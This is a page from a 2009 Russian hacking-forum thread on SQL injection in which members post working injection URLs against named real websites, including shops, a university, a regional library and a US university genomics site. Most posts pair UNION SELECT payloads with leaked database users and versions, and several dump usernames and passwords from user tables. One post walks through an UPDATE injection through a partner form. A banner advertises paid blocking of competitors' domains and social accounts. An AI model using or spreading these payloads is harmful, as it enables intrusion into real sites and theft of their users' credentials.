Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 1029 из 1242

1029

Опции темы

Поиск в этой теме

Опции просмотра

#10281

31.07.2009, 15:06

Dyxxx

Участник форума

Регистрация: 16.02.2009

Сообщений: 191

Провел на форуме:
879928

Репутация: 438

пр5
Шоп банчит борохлом и жутко ругаеться, но на вопросы всёже отвечает ))

Код:

http://shop.usskiteam.com/store/product.php?productid=16640)+UNION+SELECT+concat_ws(0x3a,user(),version()),2+--+

usski_xcart@localhost:4.1.22-standard

#10282

31.07.2009, 15:15

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

http://www.addictions.ru/info0.php?dir=1+union+select+1,2,concat_ws(0x3a,us er(),database(),version()),4--&pid=15

hmd_helpmedoc@localhost:hmd_helpmedoc:5.0.51a-community

####################################
http://www.slk-digital.ru/gadgets/?t_id=-30+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9--

slkdigital_root@localhost:5.0.51a-community:slkdigital_digital

Последний раз редактировалось HAXTA4OK; 31.07.2009 в 17:22..

#10283

31.07.2009, 23:00

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Цитата:

http://pathbinderh.plantgenomics.iastate.edu/pblevel2.php?term1=-56321+union+select+convert(version()+using+latin1) ,2/*

Version: 4.1.12-standard-log
User: pbuser@schnable-hercules.agron.iastate.edu

#10284

31.07.2009, 23:39

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

http://books.nt.am/media_info.php?ID=42+and+1=0+union+select+concat(u ser,char(58),password),2,3+from+mysql.user/*

Последний раз редактировалось jokester; 31.07.2009 в 23:44.. Причина: Правила читаем

#10285

01.08.2009, 02:05

~~mr.gr33n~~

Banned

Регистрация: 06.07.2009

Сообщений: 74

Провел на форуме:
437317

Репутация: 209

Отправить сообщение для mr.gr33n с помощью ICQ

Код:

PR:4 ТИЦ:40
http://www.meteo-nso.ru/news.php?id=-96+union+select+1,concat_ws(0x3a,name,psw),3,4,5,6,7+from+meteo_users--

#10286

01.08.2009, 09:09

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Один из престижных универов г.Уфа

http://www.mf.rusoil.net/index.php?module=content&id=35+union+select+1,conc at_ws(0x3a,user(),database(),version())--

mf@localhost:mf:4.1.16-nt

#10287

01.08.2009, 12:52

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Знаменитый surfjunkey

Цитата:

http://www.surfjunky.com/gethelp.php?q=-10'+union+select+1,2,unhex(hex(concat_ws(0x3a,user (),version(),database()))),4,5,6/*

surfjunky@68.178.158.204:4.1.10-standard-log:surfjunky_com_-_surfjunky

#10288

01.08.2009, 16:28

Bramin

Участник форума

Регистрация: 15.05.2009

Сообщений: 111

Провел на форуме:
1179199

Репутация: 127

Отправить сообщение для Bramin с помощью ICQ

Мурманская областная научная библиотека

Код HTML:

http://www.mgounb.ru/?folder=1&menu=43&content=-414+union+select+concat_ws(0x3a,user,password)+from+mysql.user--

PR: 7 ТИЦ: 400

#10289

01.08.2009, 21:14

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Инъекция в операторе UPDATE, POST-запросом:

Код:

http://wblist.ru/partner/

Регистрируемся тут с любыми даными.

Код:

http://wblist.ru/partner/p-editacc.php

Заходим сюда и пишем по очереди в любое поле:

Код:

toor',ICQ_partner=user()/*
toor',ICQ_partner=database()/*
toor',ICQ_partner=version()/*

Смотрим в поле ICQ по очереди:

Код:

tests@localhost
tests
5.0.26

Последний раз редактировалось mailbrush; 01.08.2009 в 21:18..

#10290

02.08.2009, 01:36

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

http://kulinarnayakniga.ru/search/?action=index&text=aa%27%29+union+select+1%2C2%2C3 %2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14% 2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2F*

нашел кол-во полей - 24. 3 поле активное. aa') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22/* запрос в поиске сайта

-------------------------------
список всех таблиц ---> http://kulinarnayakniga.ru/search/?action=index&text=aa%27%29+union+select+1%2C2%2CT ABLE_NAME%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2 C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22+F ROM+INFORMATION_SCHEMA.TABLES%2F*

Последний раз редактировалось ZARO; 02.08.2009 в 01:51..

Страница 1029 из 1242

1029

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход